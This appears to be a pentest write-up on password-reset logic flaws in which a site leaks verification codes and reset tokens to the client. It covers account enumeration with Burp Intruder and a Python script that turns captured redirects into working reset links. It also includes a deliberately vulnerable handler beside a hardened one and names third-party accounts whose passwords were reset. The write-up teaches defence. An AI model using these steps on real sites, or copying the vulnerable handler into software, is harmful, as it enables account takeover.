Any user password reset (1): reset credentials leak


Among logic vulnerabilities, arbitrary user password reset is the most common. It can show up on the new-user registration page, on the change-password page used after login, or on the password recovery page used when a user has forgotten the password; of these, the password recovery function is by far the worst affected. I analysed the root causes of the vulnerabilities in cases encountered during day-to-day penetration testing. This article focuses on arbitrary password resets caused by leakage of the reset credential.

Case one

When the password is recovered by email, the verification code that serves as the reset credential is sent back to the client in the HTTP response, so anyone who captures the traffic can read it. First walk through the password recovery flow with the attacker's own account. The test account is yangyangwithgnu@yeah.net; recover the password using that email address:

Click to obtain the verification code and capture the following response:


The VFCode field is most likely the verification code. Log in to the mailbox and check the password recovery email sent by the site:


The two values are identical, so it is all but confirmed that the server leaks the password recovery verification code to the client, which can lead to an arbitrary account password reset.

Next, try to recover the password of an ordinary account. On the password recovery page, as soon as an email address is entered the system checks whether that mailbox is registered:

Mark the UName parameter as the enumeration variable and, using common QQ mailbox names as the dictionary, enumerate a number of valid mailboxes:


Take chenwei@qq.com as an example: read the verification code from the response, reset its password to PenTest1024, and verify that the login works:


Now try to recover the password of an administrator account. The domain registration (WHOIS) record for the site lists the contact's email as fishliu@xxxx.cn, so it can be inferred that back-end users have the suffix @xxxx.cn. A small adjustment to a list of common back-end user names therefore yields a back-end mailbox dictionary, from which a large number of back-end users can be enumerated:


In the same way, the passwords of these back-end users could be reset. To avoid affecting the business, this was not actually done.

Case two


When the password is recovered by email, the reset link, credential included, is leaked to the client and can be captured. Walk through the password recovery flow once with the attacker's account: enter the attacker's username and email (yangyangwithgnu, yangyangwithgnu@yeah.net) on the password recovery page and submit:

Intercept the following response:

It is clearly a redirect. The two parameters isVerify and PassPhrase are suspicious and should be watched in the subsequent interactions. Let the packet through, proceed to the page that sends the reset email, enter the verification code and submit. Then log in to the attacker's mailbox to view the reset email:


The reset link with its token looks very familiar: it is the token obtained from the earlier packet capture. Compare the two:

forgotPwdEa.php?isVerify=eWFuZ3lhbmd3aXRoZ251fHlhbmd5YW5nd2l0aGdudUB5ZWFoLm5ldHw2MzQyNDkw&PassPhrase=01e4f6d4ede81b2604dc320bc4e3a6e8
forgotPwdEc.php?isVerify=eWFuZ3lhbmd3aXRoZ251fHlhbmd5YW5nd2l0aGdudUB5ZWFoLm5ldHw2MzQyNDkw&PassPhrase=01e4f6d4ede81b2604dc320bc4e3a6e8

The only difference is the file name, forgotPwdEa versus forgotPwdEc.

Next, verify that the token leaked by the server can be used to reset an ordinary user's password. As the reset flow shows, resetting a password requires the username and its email (or mobile number).

Obtain a valid username. On the registration page, as soon as a username is entered the system checks whether it is already taken:

The corresponding request and response are as follows:


If the username already exists the response is failed; if it does not, the response is ok. Using this behaviour with a dictionary of common names, a large number of valid usernames (chenchuan, chenanqi, chenanxiu, zhangfeng, and so on) can be enumerated and saved as username.txt.

Obtain the mailbox that belongs to each valid username. In the request submitted by the password recovery page, if user_name and email match, the HTTP response code is 302; the exchange is as follows:


This behaviour makes it possible to enumerate valid username/mailbox pairs. Now consider how to build the mailbox dictionary. Many users register a QQ mailbox named after their username; in other words, the username yangyangwithgnu probably corresponds to the email yangyangwithgnu@qq.com. So the mailbox dictionary qq-email.txt can be generated quickly from the username dictionary username.txt obtained earlier, with the two files corresponding line by line.

For example, the first line of the former is yangyangwithgnu and the first line of the latter is yangyangwithgnu@qq.com. Send the request above to Burp's Intruder and select pitchfork as the attack type. Mark the value of user_name as payload position 1 and load username.txt; mark the value of email as payload position 2 and load qq-email.txt. This enumerates a large number of valid username/mailbox pairs, such as zhangfeng/zhangfeng@qq.com and chenchuan/chenchuan@qq.com.

Use the ordinary account chenchuan/chenchuan@qq.com to demonstrate the password reset vulnerability. Enter the username and email, submit, let the password recovery flow complete normally, and read the reset token issued by the server from the captured exchange:

isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw==&PassPhrase=cbf0160662358808f3586868f041cbaa 

Assemble the reset link http://www.xxxx.com/user/forgotPwdEc.php?isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw==&PassPhrase=cbf0160662358808f3586868f041cbaa and open it to reach the password reset page:


After entering the new password PenTest1024, the system reports that the change succeeded. Log in with chenchuan/PenTest1024:
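The whole of case two, from the intercepted 302 to the assembled forgotPwdEc.php link, as an added worked example (not code from the original article or the site). The two 302 responses below are constructed for the example; only the isVerify and PassPhrase values are the ones quoted in the article. The isVerify value turns out to be plain Base64 of username|email|numeric id, which is why the flow needs both username and email, so the example also decodes it to show whose token a leaked redirect carries.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Constructed samples (not captures from the original site): the 302 that the
# password recovery form returns, carrying the isVerify/PassPhrase values the
# article quotes for the attacker's account and for chenchuan.
CAPTURED_REDIRECTS = [
    "HTTP/1.1 302 Found\r\n"
    "Location: /user/forgotPwdEa.php?isVerify=eWFuZ3lhbmd3aXRoZ251fHlhbmd5YW5nd2l0aGdudUB5ZWFoLm5ldHw2MzQyNDkw"
    "&PassPhrase=01e4f6d4ede81b2604dc320bc4e3a6e8\r\n"
    "Content-Length: 0\r\n\r\n",
    "HTTP/1.1 302 Found\r\n"
    "Location: /user/forgotPwdEa.php?isVerify=Y2hlbmNodWFufGNoZW5jaHVhbkBxcS5jb218MTE2MDIzNw=="
    "&PassPhrase=cbf0160662358808f3586868f041cbaa\r\n"
    "Content-Length: 0\r\n\r\n",
]

BASE_URL = "http://www.xxxx.com"  # placeholder host, as in the article


def extract_reset_params(raw_response):
    """Return {"isVerify": ..., "PassPhrase": ...} from a raw HTTP response,
    or None unless it is a 302 whose Location carries both parameters."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    status, *headers = head.split("\r\n")
    parts = status.split()
    if len(parts) < 2 or parts[1] != "302":
        return None
    location = None
    for header in headers:
        name, _, value = header.partition(":")
        if name.strip().lower() == "location":
            location = value.strip()
    if location is None:
        return None
    query = parse_qs(urlsplit(location).query)
    if "isVerify" not in query or "PassPhrase" not in query:
        return None
    return {"isVerify": query["isVerify"][0], "PassPhrase": query["PassPhrase"][0]}


def decode_is_verify(token):
    """isVerify is plain Base64 of 'username|email|id'. Re-add any padding the
    site may have stripped, decode, and split into the three fields."""
    padded = token + "=" * (-len(token) % 4)
    username, email, uid = base64.b64decode(padded).decode().split("|")
    return {"username": username, "email": email, "id": uid}


def build_reset_link(params, base_url=BASE_URL):
    """Assemble the link the reset email would contain. The page that performs
    the reset is forgotPwdEc.php, not the forgotPwdEa.php the redirect points
    at; the query string is identical. The '=' padding is left unencoded,
    exactly as the site's own email link carries it."""
    return (f"{base_url}/user/forgotPwdEc.php"
            f"?isVerify={params['isVerify']}&PassPhrase={params['PassPhrase']}")


def leaked_reset_links(responses, base_url=BASE_URL):
    """For every captured redirect, report whose token it is and the reset link
    an attacker can open without ever seeing the victim's mailbox."""
    results = []
    for raw in responses:
        params = extract_reset_params(raw)
        if params is None:
            continue
        fields = decode_is_verify(params["isVerify"])
        results.append((fields["username"], fields["email"],
                        build_reset_link(params, base_url)))
    return results


if __name__ == "__main__":
    for username, email, link in leaked_reset_links(CAPTURED_REDIRECTS):
        print(f"{username} <{email}>: {link}")
```

The second tuple returned is exactly the chenchuan link assembled above; the decoded id fields (6342490 and 1160237) are presumably internal user ids, which is consistent with the server knowing the account before it ever emails anything.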


As for defensive measures: the credential used for password recovery must never be sent to the client; it belongs only in the email or SMS delivered to the registered address. In addition, a picture CAPTCHA should be required when checking whether a mailbox or username is valid, so that these key parameters cannot be enumerated.
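The pattern from case one beside its corrected form, as an added example written for this article (not the site's code). The vulnerable handler echoes the check code in the JSON response and answers differently for registered and unregistered mailboxes; the hardened handler sends the code out of band only, returns the same response either way, stores only a hash of the code with an expiry and an attempt limit, compares in constant time and makes the code single-use. The user table, the Outbox mail stand-in and the six-digit code format are assumptions for the example; the CAPTCHA the paragraph above recommends is not modelled here. The hardening goes beyond the paragraph's two points, as noted.

```python
import hashlib
import hmac
import secrets
import time

# Constructed user table for the example (not data from the site).
USERS = {"chenwei@qq.com": {"password": "old-pass"},
         "fishliu@xxxx.cn": {"password": "admin-pass"}}


def fresh_users():
    return {email: dict(rec) for email, rec in USERS.items()}


class Outbox:
    """Stand-in for the mail gateway: records what would have been emailed."""
    def __init__(self):
        self.sent = []

    def send(self, to, body):
        self.sent.append((to, body))


def new_code():
    return f"{secrets.randbelow(10**6):06d}"  # assumed 6-digit code format


class VulnerableReset:
    """Mirrors case one: the code is emailed AND echoed to the client as
    VFCode, and the reply reveals whether the mailbox is registered."""
    def __init__(self, users, outbox):
        self.users, self.outbox, self.codes = users, outbox, {}

    def request_code(self, email):
        if email not in self.users:
            return {"Result": "fail", "Msg": "mailbox not registered"}  # enumeration oracle
        code = new_code()
        self.codes[email] = code
        self.outbox.send(email, f"Your check code is {code}")
        return {"Result": "ok", "VFCode": code}  # the leak

    def reset(self, email, code, new_password):
        if self.codes.get(email) == code:
            self.users[email]["password"] = new_password
            return True
        return False


class HardenedReset:
    """Credential only goes out of band; uniform reply; hashed, expiring,
    attempt-limited, single-use code; constant-time comparison."""
    TTL = 600
    MAX_ATTEMPTS = 5

    def __init__(self, users, outbox, now=time.time):
        self.users, self.outbox, self.now = users, outbox, now
        self.pending = {}  # email -> [code_hash, expires_at, attempts_left]

    @staticmethod
    def _hash(code):
        return hashlib.sha256(code.encode()).hexdigest()

    def request_code(self, email):
        if email in self.users:
            code = new_code()
            self.pending[email] = [self._hash(code), self.now() + self.TTL, self.MAX_ATTEMPTS]
            self.outbox.send(email, f"Your check code is {code}")
        # Identical response whether or not the mailbox exists, and no credential in it.
        return {"Result": "ok", "Msg": "If the mailbox is registered, a code has been sent"}

    def reset(self, email, code, new_password):
        entry = self.pending.get(email)
        if entry is None:
            return False
        code_hash, expires_at, attempts_left = entry
        if self.now() > expires_at or attempts_left <= 0:
            self.pending.pop(email, None)
            return False
        entry[2] -= 1
        if not hmac.compare_digest(code_hash, self._hash(code)):
            return False
        self.pending.pop(email)  # single use
        self.users[email]["password"] = new_password
        return True


def code_from_mail(outbox, email):
    """What only the legitimate mailbox owner can do: read the code."""
    for to, body in reversed(outbox.sent):
        if to == email:
            return body.rsplit(" ", 1)[1]
    return None
```

The two classes expose the same two calls, so the difference an attacker sees is entirely in what request_code returns: with the vulnerable class the JSON alone is enough to call reset; with the hardened class the only route to a usable code is the mailbox.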
